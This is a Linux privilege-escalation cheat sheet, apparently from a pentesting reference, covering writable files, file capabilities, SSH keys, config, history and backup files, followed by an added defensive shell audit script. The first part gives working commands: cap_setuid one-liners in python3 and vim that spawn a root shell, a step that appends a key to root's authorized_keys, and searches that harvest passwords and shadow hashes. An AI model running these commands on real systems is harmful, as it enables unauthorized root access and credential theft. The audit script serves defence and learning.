FILE PERMISSIONS & CAPABILITIES
World-writable files
Files anyone can modify — Config files, scripts, binaries
find / -writable -type f 2>/dev/null | grep -v proc
(-writable = writable by the current user, via access(2); strictly world-writable is -perm -0002. grep -v proc also drops any path containing "proc"; ! -path '/proc/*' excludes only procfs)
Example Output
find / -writable -type f 2>/dev/null
/etc/passwd <- can add root user!
/opt/app/config.py <- can inject code
/var/www/html/index.php <- can add webshell
World-writable directories
Directories anyone can write to — Drop files for path hijack
find / -writable -type d 2>/dev/null
Example Output
find / -writable -type d 2>/dev/null
/tmp
/var/tmp
/opt/app/plugins/ <- can drop files here
/usr/local/bin/ <- PATH hijack possible
(/tmp and /var/tmp are 1777: world-writable but sticky, so other users' files there cannot be replaced or deleted; a writable directory without the sticky bit on PATH or in an application's plugin path is the real finding)
Linux capabilities
Capabilities on binaries — cap_setuid = instant root
getcap -r / 2>/dev/null
Example Output
getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep <- instant root!
/usr/bin/ping = cap_net_raw+ep <- normal, ignore
(+ep = permitted and effective; getcap -r lists file capabilities only, not capabilities a running process already holds)
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
root
Capability abuse
GTFOBins for capabilities too — Capabilities are like mini-SUID
python3 with cap_setuid:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Example Output
getcap shows: /usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
root
OR: /usr/bin/vim = cap_setuid+ep
vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh","sh")'
SSH keys
Private keys for other users — SSH as root or other user
find / -name 'id_rsa' -o -name 'authorized_keys' -o -name '*.pem' 2>/dev/null
ls -la /home/*/.ssh/
ls -la /root/.ssh/
Example Output
find / -name id_rsa 2>/dev/null
/home/admin/.ssh/id_rsa
/root/.ssh/id_rsa <- root's key!
/opt/backups/.ssh/id_rsa
find / -name authorized_keys -writable 2>/dev/null
/root/.ssh/authorized_keys <- WRITABLE!
echo 'your_pub_key' >> /root/.ssh/authorized_keys
ssh root@localhost
(Write your key = root SSH access)
(sshd with StrictModes yes, the default, rejects an authorized_keys file or ~/.ssh directory that is group- or world-writable; the fix is mode 600 on the file and 700 on the directory, owned by the user)
Readable config files
Database passwords, API keys — Password reuse is common
find / -name '*.conf' -readable 2>/dev/null
find / -name '*.config' -readable 2>/dev/null
find / -name 'wp-config*' 2>/dev/null
Example Output
find / -name '*.conf' -readable 2>/dev/null
/etc/apache2/sites-enabled/000-default.conf
/var/www/html/wp-config.php
cat wp-config.php:
define('DB_PASSWORD', 'WordPressDBp@ss!');
(Database credentials)
History files
Previous commands — May contain typed passwords
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
cat ~/.mysql_history
Example Output
cat /home/admin/.bash_history
mysql -u root -p'S3cretDBP@ss'
ssh root@10.10.10.20
sudo su - backup_user
(Passwords typed in commands)
Backup files
Backup files with old configs — Old passwords, keys
find / -name '*.bak' -o -name '*.old' -o -name '*.backup' -o -name '*.zip' -o -name '*.tar.gz' 2>/dev/null
Example Output
find / -name '*.bak' -o -name '*.old' 2>/dev/null
/var/backups/shadow.bak <- old shadow file!
/opt/config.old <- old config with passwords
cat /var/backups/shadow.bak
root:$6$oldhash...
/opt and /srv
Custom installed applications — Often misconfigured
ls -la /opt/
ls -la /srv/
Example Output
ls -la /opt/
drwxrwxrwx admin app_v2/ <- writable custom app!
-rwsr-xr-x root monitor <- SUID custom binary!
ls -la /srv/
drwxr-xr-x root web/ <- alternative web root
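The checks in the sections above (world-writable files and directories, capabilities, SSH keys, backup files, /opt), recast from the defender's side as an added example that is not part of the original cheat sheet. It is a POSIX shell audit that tests mode bits directly (-perm -0002 rather than -writable), skips sticky /tmp-style directories, flags SUID files, group/world-writable authorized_keys files and other-readable backup copies, and filters getcap output for root-equivalent capabilities. It builds a constructed demo tree with mktemp (the paths, the sample key line and the sample shadow line are made up) and runs every check against it; the function names, the demo tree layout and the dangerous-capability list are this example's own assumptions, and it assumes a find(1) that understands -path and -perm -mode.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: the page's checks run from the
# defender's side against one directory tree. Assumes POSIX find(1) with -path/-perm;
# the demo tree, its paths and the sample key/shadow lines are constructed.

# World-writable regular files: tests the other-write mode bit. The page's
# `find -writable` instead asks "writable by the current user" (access(2)), which is broader.
audit_ww_files() {
    find "$1" ! -path '/proc/*' -type f -perm -0002 2>/dev/null
}

# World-writable directories without the sticky bit. /tmp-style directories are 1777
# (drwxrwxrwt), so other users' files there cannot be renamed or deleted; a plain 0777
# directory on PATH or in an application's plugin path is the finding that matters.
audit_ww_dirs_nosticky() {
    find "$1" -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# SUID regular files (like the custom "monitor" binary in the /opt example).
audit_suid_files() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# authorized_keys files that are group- or world-writable. sshd with StrictModes yes
# (the default) refuses them, but they still show that a non-owner can append a key.
audit_lax_authorized_keys() {
    find "$1" -type f -name authorized_keys \( -perm -0020 -o -perm -0002 \) 2>/dev/null
}

# Backup copies readable by other users (other-read bit set).
audit_readable_backups() {
    find "$1" -type f \( -name '*.bak' -o -name '*.old' -o -name '*.backup' \) -perm -0004 2>/dev/null
}

# Keep only getcap lines whose capability is root-equivalent on a binary that can run
# arbitrary code (the list is this example's assumption); cap_net_raw on ping is expected noise.
flag_dangerous_caps() {
    awk '/cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module)/'
}

# File capabilities under a tree, if getcap (libcap) is installed.
audit_file_caps() {
    if command -v getcap >/dev/null 2>&1; then
        getcap -r "$1" 2>/dev/null | flag_dangerous_caps
    fi
}

# Constructed demo tree mirroring the page's example output; prints its path.
make_demo_tree() (
    umask 022
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/tmp" "$root/opt/app/plugins" \
             "$root/home/admin/.ssh" "$root/var/backups"
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$root/etc/passwd"
    chmod 0666 "$root/etc/passwd"                      # finding: world-writable passwd
    printf 'demo\n' > "$root/etc/hostname"
    chmod 0644 "$root/etc/hostname"                    # normal, must not be reported
    chmod 1777 "$root/tmp"                             # sticky, must not be reported
    chmod 0777 "$root/opt/app/plugins"                 # finding: non-sticky plugin dir
    printf '#!/bin/sh\n' > "$root/opt/monitor"
    chmod 4755 "$root/opt/monitor"                     # finding: SUID custom binary
    printf 'ssh-ed25519 AAAAC3demo demo@host\n' > "$root/home/admin/.ssh/authorized_keys"
    chmod 0666 "$root/home/admin/.ssh/authorized_keys" # finding: anyone can append a key
    printf 'root:$6$demohash:19000:0:99999:7:::\n' > "$root/var/backups/shadow.bak"
    chmod 0644 "$root/var/backups/shadow.bak"          # finding: readable old shadow copy
    printf '%s\n' "$root"
)

# One report section per check.
audit_report() {
    for check in audit_ww_files audit_ww_dirs_nosticky audit_suid_files \
                 audit_lax_authorized_keys audit_readable_backups audit_file_caps; do
        printf '== %s ==\n' "$check"
        "$check" "$1"
    done
}

case "${1:-}" in
    --demo) demo=$(make_demo_tree); audit_report "$demo"; rm -rf "$demo" ;;
    "")     ;;                     # run without arguments: define the functions only
    *)      audit_report "$1" ;;   # e.g. sh audit.sh /
esac
```

Run it as `sh audit.sh --demo` to see the report over the constructed tree, or `sh audit.sh /` on a real host. The mode-bit tests are deliberately narrower than the page's `-writable`: they report the same thing regardless of which user runs the audit, which is what a scheduled baseline check needs, while `-writable` is the right question for an interactive session as a specific low-privileged user.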